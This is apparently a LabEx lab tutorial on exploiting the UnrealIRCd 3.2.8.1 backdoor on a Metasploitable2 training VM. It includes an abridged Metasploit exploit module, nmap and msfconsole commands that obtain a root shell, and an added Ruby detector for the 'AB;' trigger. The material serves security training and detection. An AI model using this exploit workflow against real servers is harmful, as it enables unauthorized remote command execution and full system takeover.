Introduction
In this lab, we will learn how to exploit the Unreal IRCd service on the Metasploitable2 target machine hosted on the LabEx platform. We will start by gaining an understanding of the vulnerability in the Unreal IRCd service and then perform a vulnerability scan using Nmap. After identifying the vulnerable service, we will leverage the Metasploit framework to exploit the vulnerability and gain a remote shell on the target machine. Finally, we will validate our successful exploitation by executing commands on the compromised system.
Understand the Unreal IRCd Vulnerability and Start the Experiment Environment
UnrealIRCd 3.2.8.1 contains a backdoor (CVE-2010-2075) that allows remote attackers to execute arbitrary code on the affected system. The backdoor is in the DEBUG3_DOLOG_SYSTEM macro, which contains externally introduced malicious code that an attacker can leverage.
Relevant information:
The Metasploit module for exploiting this vulnerability:
Here's a brief overview of the Metasploit module:
## Require necessary modules
require 'msf/core'

## Define the Metasploit module class
class MetasploitModule < Msf::Exploit::Remote
  ## Module initialization with details like name, description, author, references, etc.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
      'Description' => %q{
        This module exploits a malicious backdoor that was added to the
        Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
        Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
      },
      ## ... (omitted for brevity)
    ))
    ## Set default options
    register_options(
      [
        Opt::RPORT(6667)
      ], self.class)
  end

  ## Exploit method
  def exploit
    ## Connect to the remote service
    connect
    ## Print banner information
    print_status("Connected to #{rhost}:#{rport}...")
    banner = sock.get_once(-1, 30)
    banner.to_s.split("\n").each do |line|
      print_line(" #{line}")
    end
    ## Send the backdoor command
    print_status("Sending backdoor command...")
    sock.put("AB;" + payload.encoded + "\n")
    ## Wait for session creation or timeout
    1.upto(120) do
      break if session_created?
      select(nil, nil, nil, 0.25)
      handler()
    end
    disconnect
  end
end
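For defenders, the module above shows what the trigger looks like on the wire: a client-to-server line that begins with AB;. The following Ruby detector is an added example, not part of the original lab or of Metasploit; it flags such lines in cleartext IRC traffic and reassembles lines first, since one read can end mid-line. The IrcLineScanner class, the scan helper, the flow-key format and the sample chunks are assumptions constructed for illustration.

```ruby
TRIGGER = "AB;".freeze # prefix sent by the module shown above
# Reassembles per-connection chunks into lines, because a TCP read can end
# mid-line and split the trigger across two reads.
class IrcLineScanner
  MAX_LINE = 4096 # assumed cap so an unterminated line cannot grow forever
  attr_reader :alerts

  def initialize
    @buffers = Hash.new { |h, k| h[k] = String.new } # binary buffers
    @alerts = []
  end

  # flow: connection key (assumed "src_ip:src_port"); chunk: raw bytes read
  def feed(flow, chunk)
    buf = @buffers[flow]
    buf << chunk.b
    while (idx = buf.index("\n"))
      check(flow, buf.slice!(0..idx).chomp) # chomp strips \n and \r\n
    end
    return unless buf.bytesize > MAX_LINE
    check(flow, buf.dup)
    buf.clear
  end

  private
  def check(flow, line)
    return unless line.start_with?(TRIGGER)
    cmd = line.byteslice(TRIGGER.bytesize, 80)
    # Replace non-printable bytes so the alert is safe to write to a log
    @alerts << { flow: flow, command: cmd.gsub(/[^\x20-\x7e]/n, ".") }
  end
end

# Constructed sample: [flow, chunk] pairs as a sensor might read them.
SAMPLE_CHUNKS = [
  ["10.0.0.5:40112", "NICK alice\r\nUSER alice 0 * :Alice\r\n"],
  ["10.0.0.9:51844", "A"], # trigger split across two reads
  ["10.0.0.5:40112", "JOIN #lab\r\n"],
  ["10.0.0.9:51844", "B;echo constructed-sample\n"],
  ["10.0.0.5:40112", "PRIVMSG #lab :AB; mid-line is not the trigger\r\n"]
].freeze

def scan(chunks)
  scanner = IrcLineScanner.new
  chunks.each { |flow, chunk| scanner.feed(flow, chunk) }
  scanner.alerts
end

scan(SAMPLE_CHUNKS).each { |a| puts "ALERT #{a[:flow]} command=#{a[:command]}" }
```

Only the flow that sends a line starting with AB; is reported; the same characters inside a PRIVMSG body are ignored.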
Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.
- Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2
Wait for the target machine to start; it may take 1-3 minutes.
- Test the connectivity to the target machine by pinging it:
ping 192.168.122.102
Press Ctrl+C to stop the ping.
- Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
- Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102
Press Ctrl+C to stop the ping.
Now both the attack machine and the target machine are running, and you can start the penetration testing.
Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.
Perform Vulnerability Scanning
In this step, we will perform vulnerability scanning on the target machine to identify open ports and services running on those ports. We will use the powerful Nmap (Network Mapper) tool for this purpose.
- Launch the Metasploit console in the Kali Linux container:
cd ~
msfconsole
- Within the Metasploit console, use the nmap command to scan the target machine:
nmap -sV -T4 192.168.122.102
The -sV option enables version detection for the open ports, and -T4 sets the timing policy to an aggressive level (1-5, higher is faster).
The output should show an open port 6667 running the unreal ircd service.
Press Ctrl+D to quit the Metasploit console, then start the inspection.
Exploit the Unreal IRCd Vulnerability
Now that we have identified the vulnerable Unreal IRCd service running on port 6667, we can proceed with exploiting it using the Metasploit framework.
- First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
- In the Metasploit console, search for the unreal_ircd_3281_backdoor module:
search unreal_ircd_3281_backdoor
- Load the module:
use exploit/unix/irc/unreal_ircd_3281_backdoor
- Set the target host:
set RHOST 192.168.122.102
- Run the exploit:
exploit
If the exploit is successful, you should obtain a remote shell on the target machine.
Press Ctrl+D to quit the Metasploit console, then start the inspection.
Validate the Exploitation
To validate that the exploitation was successful, we can execute commands on the remote shell obtained in the previous step.
- First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
- Check the current user with the whoami command:
whoami
- Check the hostname with the hostname command:
hostname
- Check the IP address with the ifconfig command:
ifconfig
If the output shows root as the current user, metasploitable as the hostname, and the IP address matches the target machine (192.168.122.102), it confirms that the exploitation was successful, and you have gained complete control over the target system.
Press Ctrl+D to quit the Metasploit console, then start the inspection.
Summary
In this lab, we learned about the Unreal IRCd vulnerability and how to exploit it using the Metasploit framework. We started by understanding the vulnerability and its impact, then performed vulnerability scanning to identify the vulnerable service. After finding the Unreal IRCd service running on port 6667, we used the appropriate Metasploit module to exploit the vulnerability and gain remote access to the target machine. Finally, we validated our successful exploitation by executing commands on the compromised system. This lab provided hands-on experience in vulnerability analysis, exploitation, and post-exploitation validation, which are essential skills for ethical hackers and cybersecurity professionals.



